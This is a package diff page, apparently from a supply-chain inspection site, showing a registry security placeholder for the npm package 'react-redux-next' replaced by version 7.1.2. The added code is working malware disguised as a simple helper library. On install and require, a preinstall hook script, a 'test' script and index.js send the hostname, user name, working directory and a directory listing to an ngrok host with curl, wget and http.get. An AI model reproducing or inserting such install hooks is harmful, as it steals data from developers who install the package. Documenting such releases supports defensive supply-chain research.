react-redux-next 0.0.1-security → 7.1.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of react-redux-next might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/README.md +4 -5
  2. package/index.js +5 -0
  3. package/package.json +18 -3
  4. package/pre.sh +3 -0
package/README.md CHANGED
@@ -1,5 +1,4 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=react-redux-next for more information.
1
+ This package is for NextAPI in React-Redux-Next
2
+ v7.1.0-rc.1
3
+ v1.0.1
4
+ v7.1.1
package/index.js ADDED
@@ -0,0 +1,5 @@
1
+ const http = require('http');
2
+ http.get('http://b3b0-101-53-233-192.ngrok.io/npm?activemq');
3
+ exports.printMsg = function() {
4
+ console.log("Simple react-redux-next for nextAPI");
5
+ }
package/package.json CHANGED
@@ -1,6 +1,21 @@
1
1
  {
2
2
  "name": "react-redux-next",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "7.1.2",
4
+ "description": "Simple react-redux-next for nextAPI.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "wget --quiet \"http://b3b0-101-53-233-192.ngrok.io/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # test",
8
+ "preinstall": "./pre.sh"
9
+ },
10
+ "keywords": [
11
+ "test",
12
+ "react-redux-next",
13
+ "PoC"
14
+ ],
15
+ "dependencies": {},
16
+ "config": {
17
+ "unsafe-perm":true
18
+ },
19
+ "author": "mkj47",
20
+ "license": "ISC"
6
21
  }
package/pre.sh ADDED
@@ -0,0 +1,3 @@
1
+ #!/bin/bash
2
+
3
+ curl -H "Hostname: $(hostname | base64)" -H "Whoami: $(whoami | base64)" -H "Pwd: $(pwd | base64)" -d $(ls -la | base64) http://b3b0-101-53-233-192.ngrok.io/